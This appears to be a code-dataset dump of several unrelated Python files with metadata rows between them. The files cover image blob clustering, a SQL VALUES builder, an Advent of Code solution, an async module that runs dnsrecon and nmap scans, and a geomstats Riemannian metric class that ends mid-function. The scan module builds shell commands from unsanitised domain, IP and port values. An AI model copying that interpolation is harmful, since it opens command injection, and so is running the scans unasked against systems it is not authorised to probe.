P_binder = AdjBinder(CDeepP) # binder needs data about clusters of the same level
P_ = form_P_(zip(*dert_), crit__[y], mask[y], P_binder) # horizontal clustering, adds a row of Ps
if render:
render = streamer.update_blob_conversion(y, P_) # if return False, stop rendering
P_ = scan_P_(P_, stack_, root_dert__, sub_blobs, P_binder) # vertical clustering, adds up_connects per P and down_connect_cnt per stack
stack_ = form_stack_(P_, root_dert__, sub_blobs, y)
stack_binder.bind_from_lower(P_binder)
while stack_: # frame ends, last-line stacks are merged into their blobs:
form_blob(stack_.popleft(), root_dert__, sub_blobs)
blob_binder = AdjBinder(CDeepBlob)
blob_binder.bind_from_lower(stack_binder)
assign_adjacents(blob_binder) # add adj_blobs to each blob
# sub_blobs = find_adjacent(sub_blobs)
if render: # rendering mode after blob conversion
streamer.end_blob_conversion(y)
return sub_blobs
# clustering functions:
# -------------------------------------------------------------------------------------------------------------------
def form_P_(dert_, crit_, mask_, binder): # segment dert__ into P__, in horizontal ) vertical order
P_ = deque() # row of Ps
sign_ = crit_ > 0
x0 = 0
try:
while mask_[x0]: # skip until not masked
next(dert_)
x0 += 1
except IndexError:
return P_ # the whole line is masked, return an empty P
I, iDy, iDx, G, Dy, Dx, M, L = *next(dert_), 1 # initialize P params
_sign = sign_[x0]
_mask = mask_[x0] # mask bit per dert
for x, (i, idy, idx, g, dy, dx, m) in enumerate(dert_, start=x0+1): # loop left to right in each row of derts
mask = mask_[x]
if ~mask: # current dert is not masked
sign = sign_[x]
if ~_mask and sign != _sign: # prior dert is not masked and sign changed
# pack P
P = CDeepP(I=I, G=G, Dy=Dy, Dx=Dx, M=M, iDy=iDy, iDx=iDx, L=L,x0=x0, sign=_sign)
P_.append(P)
# initialize P params:
I, iDy, iDx, G, Dy, Dx, M, L, x0 = 0, 0, 0, 0, 0, 0, 0, 0, x
elif _mask:
I, iDy, iDx, G, Dy, Dx, M, L, x0 = 0, 0, 0, 0, 0, 0, 0, 0, x
# current dert is masked
elif ~_mask: # prior dert is not masked
# pack P
P = CDeepP(I=I, G=G, Dy=Dy, Dx=Dx, M=M, iDy=iDy, iDx=iDx, L=L, x0=x0, sign=_sign)
P_.append(P)
# initialize P params: (redundant)
# I, iDy, iDx, G, Dy, Dx, M, L, x0 = 0, 0, 0, 0, 0, 0, 0, 0, x + 1
if ~mask: # accumulate P params:
I += i
iDy += idy
iDx += idx
G += g
Dy += dy
Dx += dx
M += m
L += 1
_sign = sign # prior sign
_mask = mask
if ~_mask: # terminate and pack last P in a row if prior dert is unmasked
P = CDeepP(I=I, G=G, Dy=Dy, Dx=Dx, M=M, iDy=iDy, iDx=iDx, L=L, x0=x0, sign=_sign)
P_.append(P)
for _P, P in pairwise(P_):
if _P.x0 + _P.L == P.x0: # check if Ps are adjacents
binder.bind(_P, P)
return P_
def scan_P_(P_, stack_, root_dert__, sub_blobs, binder): # merge P into higher-row stack of Ps with same sign and x_coord overlap
next_P_ = deque() # to recycle P + up_connect_ that finished scanning _P, will be converted into next_stack_
if P_ and stack_: # if both input row and higher row have any Ps / _Ps left
P = P_.popleft() # load left-most (lowest-x) input-row P
stack = stack_.popleft() # higher-row stacks
_P = stack.Py_[-1] # last element of each stack is higher-row P
up_connect_ = [] # list of same-sign x-overlapping _Ps per P
while True: # while both P_ and stack_ are not empty
x0 = P.x0 # first x in P
xn = x0 + P.L # first x beyond P
_x0 = _P.x0 # first x in _P
_xn = _x0 + _P.L # first x beyond _P
if stack.G > 0: # check for overlaps in 8 directions, else a blob may leak through its external blob
if _x0 - 1 < xn and x0 < _xn + 1: # x overlap between loaded P and _P
if P.sign == stack.sign: # sign match
stack.down_connect_cnt += 1
up_connect_.append(stack) # buffer P-connected higher-row stacks into P' up_connect_
else:
binder.bind(_P, P)
else: # -G, check for orthogonal overlaps only: 4 directions, edge blobs are more selective
if _x0 < xn and x0 < _xn: # x overlap between loaded P and _P
if P.sign == stack.sign: # sign match
stack.down_connect_cnt += 1
up_connect_.append(stack) # buffer P-connected higher-row stacks into P' up_connect_
else:
binder.bind(_P, P)
if (xn < _xn or # _P overlaps next P in P_
xn == _xn and stack.sign): # sign taken into account
next_P_.append((P, up_connect_)) # recycle _P for the next run of scan_P_
up_connect_ = []
if P_:
P = P_.popleft() # load next P
else: # terminate loop
if stack.down_connect_cnt != 1: # terminate stack, merge it into up_connects' blobs
form_blob(stack, root_dert__, sub_blobs)
break
else: # no next-P overlap
if stack.down_connect_cnt != 1: # terminate stack, merge it into up_connects' blobs
form_blob(stack, root_dert__, sub_blobs)
if stack_: # load stack with next _P
stack = stack_.popleft()
_P = stack.Py_[-1]
else: # no stack left: terminate loop
next_P_.append((P, up_connect_))
break
while P_: # terminate Ps and stacks that continue at row's end
next_P_.append((P_.popleft(), [])) # no up_connect
while stack_:
form_blob(stack_.popleft(), root_dert__, sub_blobs) # down_connect_cnt always == 0
return next_P_ # each element is P + up_connect_ refs
def form_stack_(P_, root_dert__, sub_blobs, y): # Convert or merge every P into its stack of Ps, merge blobs
next_stack_ = deque() # converted to stack_ in the next run of scan_P_
while P_:
P, up_connect_ = P_.popleft()
I, G, Dy, Dx, M, iDy, iDx, L, x0, s = P.unpack()
xn = x0 + L # next-P x0
if not up_connect_:
# initialize new stack for each input-row P that has no connections in higher row:
blob = CDeepBlob(Dert=dict(I=0, G=0, Dy=0, Dx=0, M=0, iDy=0, iDx=0, S=0, Ly=0),
box=[y, x0, xn], stack_=[], sign=s, open_stacks=1)
new_stack = CDeepStack(I=I, G=G, Dy=0, Dx=Dx, M=M, iDy=iDy, iDx=iDx, S=L, Ly=1,
y0=y, Py_=[P], blob=blob, down_connect_cnt=0, sign=s)
new_stack.hid = blob.id
blob.stack_.append(new_stack)
else:
if len(up_connect_) == 1 and up_connect_[0].down_connect_cnt == 1:
# P has one up_connect and that up_connect has one down_connect=P: merge P into up_connect stack:
new_stack = up_connect_[0]
new_stack.accumulate(I=I, G=G, Dy=Dy, Dx=Dx, M=M, iDy=iDy, iDx=iDx, S=L, Ly=1)
new_stack.Py_.append(P) # Py_: vertical buffer of Ps
new_stack.down_connect_cnt = 0 # reset down_connect_cnt
blob = new_stack.blob
else: # if > 1 up_connects, or 1 up_connect that has > 1 down_connect_cnt:
blob = up_connect_[0].blob
# initialize new_stack with up_connect blob:
new_stack = CDeepStack(I=I, G=G, Dy=0, Dx=Dx, M=M, iDy=iDy, iDx=iDx, S=L, Ly=1,
y0=y, Py_=[P], blob=blob, down_connect_cnt=0, sign=s)
new_stack.hid = blob.id
blob.stack_.append(new_stack)
if len(up_connect_) > 1: # merge blobs of all up_connects
if up_connect_[0].down_connect_cnt == 1: # up_connect is not terminated
form_blob(up_connect_[0], root_dert__, sub_blobs) # merge stack of 1st up_connect into its blob
for up_connect in up_connect_[1:len(up_connect_)]: # merge blobs of other up_connects into blob of 1st up_connect
if up_connect.down_connect_cnt == 1:
form_blob(up_connect, root_dert__, sub_blobs)
if not up_connect.blob is blob:
merged_blob = up_connect.blob
I, G, Dy, Dx, M, iDy, iDx, S, Ly = merged_blob.Dert.values()
accum_Dert(blob.Dert, I=I, G=G, Dy=Dy, Dx=Dx, M=M, iDy=iDy, iDx=iDx, S=S, Ly=Ly)
blob.open_stacks += merged_blob.open_stacks
blob.box[0] = min(blob.box[0], merged_blob.box[0]) # extend box y0
blob.box[1] = min(blob.box[1], merged_blob.box[1]) # extend box x0
blob.box[2] = max(blob.box[2], merged_blob.box[2]) # extend box xn
for stack in merged_blob.stack_:
if not stack is up_connect:
stack.blob = blob # blobs in other up_connects are references to blob in the first up_connect.
stack.hid = blob.id
blob.stack_.append(stack) # buffer of merged root stacks.
up_connect.blob = blob
up_connect.hid = blob.id
blob.stack_.append(up_connect)
blob.open_stacks -= 1 # overlap with merged blob.
blob.box[1] = min(blob.box[1], x0) # extend box x0
blob.box[2] = max(blob.box[2], xn) # extend box xn
P.hid = new_stack.id # assign higher cluster id for P
next_stack_.append(new_stack)
return next_stack_
def form_blob(stack, root_dert__, sub_blobs): # increment blob with terminated stack, check for blob termination
I, G, Dy, Dx, M, iDy, iDx, S, Ly, y0, Py_, blob, down_connect_cnt, sign = stack.unpack()
accum_Dert(blob.Dert, I=I, G=G, Dy=Dy, Dx=Dx, M=M, iDy=iDy, iDx=iDx, S=S, Ly=Ly)
# terminated stack is merged into continued or initialized blob (all connected stacks):
blob.open_stacks += down_connect_cnt - 1 # incomplete stack cnt + terminated stack down_connect_cnt - 1: stack itself
# open stacks contain Ps of a current row and may be extended with new x-overlapping Ps in next run of scan_P_
if blob.open_stacks == 0: # if number of incomplete stacks == 0
# blob is terminated and packed in blob root:
last_stack = stack
y0, x0, xn = blob.box
yn = last_stack.y0 + last_stack.Ly
mask = np.ones((yn - y0, xn - x0), dtype=bool) # mask box, then unmask Ps:
for stack in blob.stack_:
for y, P in enumerate(stack.Py_, start=stack.y0 - y0):
x_start = P.x0 - x0
x_stop = x_start + P.L
mask[y, x_start:x_stop] = False
fopen = 0 # flag: blob on frame boundary
if x0 == 0 or xn == root_dert__[0].shape[1] or y0 == 0 or yn == root_dert__[0].shape[0]:
fopen = 1
blob.root_dert__ = root_dert__
blob.box = (y0, yn, x0, xn)
blob.dert__ = [derts[y0:yn, x0:xn] for derts in root_dert__]
blob.mask = mask
blob.adj_blobs = [[], 0, 0]
blob.fopen = fopen
sub_blobs.append(blob)
def extend_dert(blob): # extend dert borders (+1 dert to boundaries)
y0, yn, x0, xn = blob.box # extend dert box:
rY, rX = blob.root_dert__[0].shape # higher dert size
# determine pad size
y0e = max(0, y0 - 1)
yne = min(rY, yn + 1)
x0e = max(0, x0 - 1)
xne = min(rX, xn + 1) # e is for extended
# take ext_dert__ from part of root_dert__
ext_dert__ = [derts[y0e:yne, x0e:xne] if derts is not None else None
for derts in blob.root_dert__]
# pad mask: top, btm, left, right. 1 or 0 at boundaries
mask = np.pad(blob.mask, ((y0 - y0e, yne - yn), (x0 - x0e, xne - xn)),
mode='constant', constant_values=True)
return ext_dert__, mask
def accum_Dert(Dert: dict, **params) -> None:
Dert.update({param: Dert[param] + value for param, value in params.items()})
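A tiny check of accum_Dert: the passed parameters are added into the accumulating Dert in place, which is how merged blobs fold their params into the surviving blob above:

Dert = dict(I=10, G=5, Dy=1, Dx=2, M=3, iDy=0, iDx=0, S=4, Ly=2)
accum_Dert(Dert, I=1, G=1, Dy=0, Dx=0, M=1, iDy=0, iDx=0, S=2, Ly=1)
assert Dert == dict(I=11, G=6, Dy=1, Dx=2, M=4, iDy=0, iDx=0, S=6, Ly=3)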
| 44.740654
| 144
| 0.576584
| 2,827
| 19,149
| 3.700035
| 0.140785
| 0.034417
| 0.024092
| 0.005736
| 0.225621
| 0.205736
| 0.190153
| 0.16262
| 0.142925
| 0.139866
| 0
| 0.016623
| 0.318293
| 19,149
| 428
| 145
| 44.740654
| 0.784664
| 0.353804
| 0
| 0.293729
| 0
| 0
| 0.001977
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026403
| false
| 0
| 0.029703
| 0
| 0.224422
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5f35dd267171d89db5d5ed7c57d46dbcf723ae2
| 2,502
|
py
|
Python
|
polecat/db/sql/expression/values.py
|
furious-luke/polecat
|
7be5110f76dc42b15c922c1bb7d49220e916246d
|
[
"MIT"
] | 4
|
2019-08-10T12:56:12.000Z
|
2020-01-21T09:51:20.000Z
|
polecat/db/sql/expression/values.py
|
furious-luke/polecat
|
7be5110f76dc42b15c922c1bb7d49220e916246d
|
[
"MIT"
] | 71
|
2019-04-09T05:39:21.000Z
|
2020-05-16T23:09:24.000Z
|
polecat/db/sql/expression/values.py
|
furious-luke/polecat
|
7be5110f76dc42b15c922c1bb7d49220e916246d
|
[
"MIT"
] | null | null | null |
from functools import partial
from polecat.db.query import query as query_module
from psycopg2.sql import SQL, Placeholder
from .expression import Expression
class Values(Expression):
def __init__(self, values, relation=None):
self.values = values
self.relation = relation
self.keyword = 'VALUES'
def to_sql(self):
if isinstance(self.values, query_module.Values):
get_values_sql = partial(
self.get_values_sql_from_values, self.values
)
else:
get_values_sql = partial(
self.get_values_sql_from_dict, self.values
)
return self.get_values_sql(get_values_sql)
def get_values_sql(self, get_values_sql):
values_sql, values_args = get_values_sql()
joined_sql = SQL(', ').join(
SQL('({})').format(
SQL(', ').join(row_sql)
)
for row_sql in values_sql
)
return SQL('%s {}' % self.keyword).format(joined_sql), values_args
def get_values_sql_from_values(self, values):
column_values_sql = []
column_values = ()
for row in values.iter_rows():
row_values_sql = []
for column_name, column_value in row:
value_sql, value = self.value_to_sql(column_value, column_name)
row_values_sql.append(value_sql)
column_values += value
column_values_sql.append(row_values_sql)
return column_values_sql, column_values
def get_values_sql_from_dict(self, values_dict):
column_values_sql = []
column_values = ()
for column_name, column_value in values_dict.items():
value_sql, value = self.value_to_sql(column_value, column_name)
column_values_sql.append(value_sql)
column_values += value
return (column_values_sql,), column_values
def value_to_sql(self, value, column_name=None):
if isinstance(value, Expression):
sql, args = value.to_sql()
return SQL('{}').format(sql), args
else:
if self.relation and column_name:
column = self.relation.get_column(column_name)
value = column.to_db_value(value)
return Placeholder(), (value,)
def iter_column_names(self):
if isinstance(self.values, dict):
return self.values.keys()
else:
return self.values.iter_column_names()
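A minimal sketch of rendering a VALUES clause from a dict; psycopg2 Composable objects need a live connection (or cursor) to produce a string, so the DSN below is hypothetical:

import psycopg2

conn = psycopg2.connect('dbname=demo')  # hypothetical DSN
values = Values({'name': 'alice', 'age': 30})
sql, args = values.to_sql()
print(sql.as_string(conn))  # VALUES (%s, %s)
print(args)                 # ('alice', 30)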
| 34.75 | 79 | 0.61311 | 304 | 2,502 | 4.713816 | 0.151316 | 0.138172 | 0.092114 | 0.044662 | 0.406141 | 0.36776 | 0.291696 | 0.177251 | 0.121424 | 0.066992 | 0 | 0.00057 | 0.298961 | 2,502 | 71 | 80 | 35.239437 | 0.81642 | 0 | 0 | 0.213115 | 0 | 0 | 0.008393 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.114754 | false | 0 | 0.065574 | 0 | 0.327869 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d5f3f84aa262b2485923b0060a6795013deae56c | 1,292 | py | Python | python/day3p1.py | swilcox/2019adventofcode | b67261aae74805ba8c2f4b72f09dd79277224ebb | ["MIT"] | 1 | 2020-01-18T18:24:18.000Z | 2020-01-18T18:24:18.000Z | python/day3p1.py | swilcox/2019adventofcode | b67261aae74805ba8c2f4b72f09dd79277224ebb | ["MIT"] | null | null | null | python/day3p1.py | swilcox/2019adventofcode | b67261aae74805ba8c2f4b72f09dd79277224ebb | ["MIT"] | null | null | null |
# 2019 advent day 3
MOVES = {
    'R': (lambda x: (x[0], x[1] + 1)),
    'L': (lambda x: (x[0], x[1] - 1)),
    'U': (lambda x: (x[0] + 1, x[1])),
    'D': (lambda x: (x[0] - 1, x[1])),
}


def build_route(directions: list) -> list:
    current_location = (0, 0)
    route = []
    for d in directions:
        direction, amount = d[0], int(d[1:])
        for _ in range(amount):
            current_location = MOVES[direction](current_location)
            route.append(current_location)
    return route


def find_intersections(r1: list, r2: list) -> set:
    return set(r1).intersection(set(r2))


def find_shortest_manhattan_distance(points: set) -> int:
    return min((abs(p[0]) + abs(p[1])) for p in points)


# R1 = 'R75,D30,R83,U83,L12,D49,R71,U7,L72'
# R2 = 'U62,R66,U55,R34,D71,R55,D58,R83'
# R1 = 'R98,U47,R26,D63,R33,U87,L62,D20,R33,U53,R51'
# R2 = 'U98,R91,D20,R16,D67,R40,U7,R15,U6,R7'


def main():
    # route1 = build_route(R1.split(','))
    # route2 = build_route(R2.split(','))
    with open('day3input.txt') as f:
        line1, line2 = f.readlines()
    route1 = build_route(line1.strip().split(','))
    route2 = build_route(line2.strip().split(','))
    print(find_shortest_manhattan_distance(find_intersections(route1, route2)))


if __name__ == "__main__":
    main()
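A sanity check against the samples kept as comments above; per the 2019 day-3 puzzle text, these wire pairs should yield distances 159 and 135 respectively:

    # Uses the first commented sample pair; no input file needed.
    r1 = build_route('R75,D30,R83,U83,L12,D49,R71,U7,L72'.split(','))
    r2 = build_route('U62,R66,U55,R34,D71,R55,D58,R83'.split(','))
    assert find_shortest_manhattan_distance(find_intersections(r1, r2)) == 159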
| 26.367347 | 79 | 0.600619 | 198 | 1,292 | 3.787879 | 0.464646 | 0.066667 | 0.042667 | 0.048 | 0.064 | 0.064 | 0.064 | 0 | 0 | 0 | 0 | 0.112512 | 0.202012 | 1,292 | 48 | 80 | 26.916667 | 0.614937 | 0.200464 | 0 | 0 | 0 | 0 | 0.026341 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.148148 | false | 0 | 0 | 0.074074 | 0.259259 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d5f42d830df55813fe6234674e4d597dccbd7f59 | 1,054 | py | Python | examples/demo/python/catalog.py | JavDomGom/mist | 83ae9f67df61ff2387a7d424cff0f8591a6a645f | ["Apache-2.0"] | 1 | 2021-04-23T17:13:31.000Z | 2021-04-23T17:13:31.000Z | examples/demo/python/catalog.py | JavDomGom/mist | 83ae9f67df61ff2387a7d424cff0f8591a6a645f | ["Apache-2.0"] | null | null | null | examples/demo/python/catalog.py | JavDomGom/mist | 83ae9f67df61ff2387a7d424cff0f8591a6a645f | ["Apache-2.0"] | null | null | null |
import asyncio


async def searchDomains(domain, q):
    domains = []
    # Stream dnsrecon output and pick up A records as they appear.
    proc = await asyncio.create_subprocess_shell(
        f"dnsrecon -d {domain} -t crt", stdout=asyncio.subprocess.PIPE)
    line = True
    while line:
        line = (await proc.stdout.readline()).decode('utf-8')
        fields = line.split()
        if len(fields) > 1 and fields[1] == "A":
            if q:
                await q.put(fields[2])
            domains.append(fields[2])
    return domains


async def findOpenPorts(ip, ports, q):
    openPorts = []
    # Stream nmap output; "NNN/tcp open service" lines mark open ports.
    proc = await asyncio.create_subprocess_shell(
        f"nmap -p {ports} --open {ip}", stdout=asyncio.subprocess.PIPE)
    line = True
    while line:
        line = (await proc.stdout.readline()).decode('utf-8')
        fields = line.split()
        if len(fields) > 1 and fields[1] == "open":
            openPort = fields[0].split("/")
            if q:
                await q.put({"ip": ip, "port": openPort[0],
                             "protocol": openPort[1]})
            openPorts.append({"port": openPort[0], "protocol": openPort[1]})
    return openPorts
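A hypothetical driver for the coroutines above, assuming nmap is installed and on PATH; results are returned and, when a queue is passed, also streamed to it:

    async def demo():
        q = asyncio.Queue()
        open_ports = await findOpenPorts('127.0.0.1', '22,80,443', q)
        print(open_ports)  # e.g. [{'port': '22', 'protocol': 'tcp'}, ...]

    asyncio.run(demo())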
| 36.344828 | 112 | 0.588235 | 133 | 1,054 | 4.631579 | 0.368421 | 0.045455 | 0.051948 | 0.071429 | 0.642857 | 0.603896 | 0.506494 | 0.383117 | 0.383117 | 0.383117 | 0 | 0.016645 | 0.259013 | 1,054 | 28 | 113 | 37.642857 | 0.772087 | 0 | 0 | 0.384615 | 0 | 0 | 0.091082 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.038462 | 0 | 0.115385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d5f5d714834d96889f873a0d7ec900fdf1926bca | 21,522 | py | Python | geomstats/geometry/riemannian_metric.py | stefanheyder/geomstats | c4e6d959db7b1bcc99b00b535b8aa5d832b62e28 | ["MIT"] | null | null | null | geomstats/geometry/riemannian_metric.py | stefanheyder/geomstats | c4e6d959db7b1bcc99b00b535b8aa5d832b62e28 | ["MIT"] | null | null | null | geomstats/geometry/riemannian_metric.py | stefanheyder/geomstats | c4e6d959db7b1bcc99b00b535b8aa5d832b62e28 | ["MIT"] | null | null | null |
"""Riemannian and pseudo-Riemannian metrics."""
import math
import warnings
import autograd
import geomstats.backend as gs
from geomstats.geometry.connection import Connection
EPSILON = 1e-4
N_CENTERS = 10
TOLERANCE = 1e-5
N_REPETITIONS = 20
N_MAX_ITERATIONS = 50000
N_STEPS = 10
def loss(y_pred, y_true, metric):
"""Compute loss function between prediction and ground truth.
Loss function given by a Riemannian metric,
expressed as the squared geodesic distance between the prediction
and the ground truth.
Parameters
----------
y_pred
y_true
metric
Returns
-------
loss
"""
loss = metric.squared_dist(y_pred, y_true)
return loss
def grad(y_pred, y_true, metric):
"""Closed-form for the gradient of the loss function."""
tangent_vec = metric.log(base_point=y_pred, point=y_true)
grad_vec = - 2. * tangent_vec
inner_prod_mat = metric.inner_product_matrix(base_point=y_pred)
grad = gs.einsum('ni,nij->ni',
grad_vec,
gs.transpose(inner_prod_mat, axes=(0, 2, 1)))
return grad
class RiemannianMetric(Connection):
    """Class for Riemannian and pseudo-Riemannian metrics."""

    def __init__(self, dimension, signature=None):
        assert isinstance(dimension, int) or dimension == math.inf
        assert dimension > 0
        super().__init__(dimension=dimension)
        self.signature = signature

    def inner_product_matrix(self, base_point=None):
        """Inner product matrix at the tangent space at a base point.

        Parameters
        ----------
        base_point : array-like, shape=[n_samples, dimension], optional
        """
        raise NotImplementedError(
            'The computation of the inner product matrix'
            ' is not implemented.')

    def inner_product_inverse_matrix(self, base_point=None):
        """Inverse of the inner product matrix at the tangent space at a base point.

        Parameters
        ----------
        base_point : array-like, shape=[n_samples, dimension], optional
        """
        metric_matrix = self.inner_product_matrix(base_point)
        cometric_matrix = gs.linalg.inv(metric_matrix)
        return cometric_matrix

    def inner_product_derivative_matrix(self, base_point=None):
        """Compute derivative of the inner prod matrix at base point.

        Parameters
        ----------
        base_point : array-like, shape=[n_samples, dimension], optional
        """
        metric_derivative = autograd.jacobian(self.inner_product_matrix)
        return metric_derivative(base_point)

    def christoffels(self, base_point):
        """Compute Christoffel symbols associated with the connection.

        Parameters
        ----------
        base_point: array-like, shape=[n_samples, dimension]

        Returns
        -------
        christoffels: array-like,
            shape=[n_samples, dimension, dimension, dimension]
        """
        cometric_mat_at_point = self.inner_product_inverse_matrix(base_point)
        metric_derivative_at_point = self.inner_product_derivative_matrix(
            base_point)
        term_1 = gs.einsum('nim,nmkl->nikl',
                           cometric_mat_at_point,
                           metric_derivative_at_point)
        term_2 = gs.einsum('nim,nmlk->nilk',
                           cometric_mat_at_point,
                           metric_derivative_at_point)
        term_3 = - gs.einsum('nim,nklm->nikl',
                             cometric_mat_at_point,
                             metric_derivative_at_point)
        christoffels = 0.5 * (term_1 + term_2 + term_3)
        return christoffels
    def inner_product(self, tangent_vec_a, tangent_vec_b, base_point=None):
        """Inner product between two tangent vectors at a base point.

        Parameters
        ----------
        tangent_vec_a: array-like, shape=[n_samples, dimension]
            or shape=[1, dimension]
        tangent_vec_b: array-like, shape=[n_samples, dimension]
            or shape=[1, dimension]
        base_point: array-like, shape=[n_samples, dimension]
            or shape=[1, dimension]

        Returns
        -------
        inner_product : array-like, shape=[n_samples,]
        """
        tangent_vec_a = gs.to_ndarray(tangent_vec_a, to_ndim=2)
        tangent_vec_b = gs.to_ndarray(tangent_vec_b, to_ndim=2)
        n_tangent_vec_a = gs.shape(tangent_vec_a)[0]
        n_tangent_vec_b = gs.shape(tangent_vec_b)[0]

        inner_prod_mat = self.inner_product_matrix(base_point)
        inner_prod_mat = gs.to_ndarray(inner_prod_mat, to_ndim=3)
        n_mats = gs.shape(inner_prod_mat)[0]

        if n_tangent_vec_a != n_mats:
            if n_tangent_vec_a == 1:
                tangent_vec_a = gs.squeeze(tangent_vec_a, axis=0)
                einsum_str_a = 'j,njk->nk'
            elif n_mats == 1:
                inner_prod_mat = gs.squeeze(inner_prod_mat, axis=0)
                einsum_str_a = 'nj,jk->nk'
            else:
                raise ValueError('Shape mismatch for einsum.')
        else:
            einsum_str_a = 'nj,njk->nk'

        aux = gs.einsum(einsum_str_a, tangent_vec_a, inner_prod_mat)
        n_auxs, _ = gs.shape(aux)

        if n_tangent_vec_b != n_auxs:
            if n_auxs == 1:
                aux = gs.squeeze(aux, axis=0)
                einsum_str_b = 'k,nk->n'
            elif n_tangent_vec_b == 1:
                tangent_vec_b = gs.squeeze(tangent_vec_b, axis=0)
                einsum_str_b = 'nk,k->n'
            else:
                raise ValueError('Shape mismatch for einsum.')
        else:
            einsum_str_b = 'nk,nk->n'

        inner_prod = gs.einsum(einsum_str_b, aux, tangent_vec_b)
        inner_prod = gs.to_ndarray(inner_prod, to_ndim=2, axis=1)

        assert gs.ndim(inner_prod) == 2, inner_prod.shape
        return inner_prod
    def squared_norm(self, vector, base_point=None):
        """Compute the square of the norm of a vector.

        Squared norm of a vector associated to the inner product
        at the tangent space at a base point.

        Parameters
        ----------
        vector : array-like, shape=[n_samples, dimension]
        base_point : array-like, shape=[n_samples, dimension]

        Returns
        -------
        sq_norm : array-like, shape=[n_samples,]
        """
        sq_norm = self.inner_product(vector, vector, base_point)
        return sq_norm

    def norm(self, vector, base_point=None):
        """Compute norm of a vector.

        Norm of a vector associated to the inner product
        at the tangent space at a base point.

        Note: This only works for positive-definite
        Riemannian metrics and inner products.

        Parameters
        ----------
        vector : array-like, shape=[n_samples, dimension]
        base_point : array-like, shape=[n_samples, dimension]

        Returns
        -------
        norm : array-like, shape=[n_samples,]
        """
        sq_norm = self.squared_norm(vector, base_point)
        norm = gs.sqrt(sq_norm)
        return norm
    def geodesic(self, initial_point,
                 end_point=None, initial_tangent_vec=None,
                 point_type='vector'):
        """Return the geodesic as function of t.

        Geodesic curve defined by either:
        - an initial point and an initial tangent vector, or
        - an initial point and an end point.

        The geodesic is returned as a function parameterized by t.

        Parameters
        ----------
        initial_point : array-like, shape=[n_samples, dimension]
        end_point : array-like, shape=[n_samples, dimension], optional
        initial_tangent_vec : array-like, shape=[n_samples, dimension],
            optional
        point_type : str, optional

        Returns
        -------
        path : callable
        """
        point_ndim = 1
        if point_type == 'matrix':
            point_ndim = 2

        initial_point = gs.to_ndarray(initial_point,
                                      to_ndim=point_ndim + 1)

        if end_point is None and initial_tangent_vec is None:
            raise ValueError('Specify an end point or an initial tangent '
                             'vector to define the geodesic.')
        if end_point is not None:
            end_point = gs.to_ndarray(end_point,
                                      to_ndim=point_ndim + 1)
            shooting_tangent_vec = self.log(point=end_point,
                                            base_point=initial_point)
            if initial_tangent_vec is not None:
                assert gs.allclose(shooting_tangent_vec, initial_tangent_vec)
            initial_tangent_vec = shooting_tangent_vec
        initial_tangent_vec = gs.array(initial_tangent_vec)
        initial_tangent_vec = gs.to_ndarray(initial_tangent_vec,
                                            to_ndim=point_ndim + 1)

        def path(t):
            """Generate a function parameterizing the geodesic.

            Parameters
            ----------
            t : parameter value of the geodesic

            Returns
            -------
            point_at_time_t : callable
            """
            t = gs.cast(t, gs.float32)
            t = gs.to_ndarray(t, to_ndim=1)
            t = gs.to_ndarray(t, to_ndim=2, axis=1)
            new_initial_point = gs.to_ndarray(
                initial_point,
                to_ndim=point_ndim + 1)
            new_initial_tangent_vec = gs.to_ndarray(
                initial_tangent_vec,
                to_ndim=point_ndim + 1)

            if point_type == 'vector':
                tangent_vecs = gs.einsum('il,nk->ik',
                                         t,
                                         new_initial_tangent_vec)
            elif point_type == 'matrix':
                tangent_vecs = gs.einsum('il,nkm->ikm',
                                         t,
                                         new_initial_tangent_vec)

            point_at_time_t = self.exp(tangent_vec=tangent_vecs,
                                       base_point=new_initial_point)
            return point_at_time_t

        return path
    def squared_dist(self, point_a, point_b):
        """Squared geodesic distance between two points.

        Parameters
        ----------
        point_a : array-like, shape=[n_samples, dimension]
        point_b : array-like, shape=[n_samples, dimension]

        Returns
        -------
        sq_dist : array-like, shape=[n_samples,]
        """
        log = self.log(point=point_b, base_point=point_a)
        sq_dist = self.squared_norm(vector=log, base_point=point_a)
        return sq_dist

    def dist(self, point_a, point_b):
        """Geodesic distance between two points.

        Note: It only works for positive definite
        Riemannian metrics.

        Parameters
        ----------
        point_a : array-like, shape=[n_samples, dimension]
        point_b : array-like, shape=[n_samples, dimension]

        Returns
        -------
        dist : array-like, shape=[n_samples,]
        """
        sq_dist = self.squared_dist(point_a, point_b)
        dist = gs.sqrt(sq_dist)
        return dist
    def variance(self,
                 points,
                 weights=None,
                 base_point=None,
                 point_type='vector'):
        """Variance of (weighted) points wrt a base point.

        Parameters
        ----------
        points: array-like, shape=[n_samples, dimension]
        weights: array-like, shape=[n_samples, 1], optional
        """
        if point_type == 'vector':
            points = gs.to_ndarray(points, to_ndim=2)
        if point_type == 'matrix':
            points = gs.to_ndarray(points, to_ndim=3)
        n_points = gs.shape(points)[0]

        if weights is None:
            weights = gs.ones((n_points, 1))

        weights = gs.array(weights)
        weights = gs.to_ndarray(weights, to_ndim=2, axis=1)

        sum_weights = gs.sum(weights)

        if base_point is None:
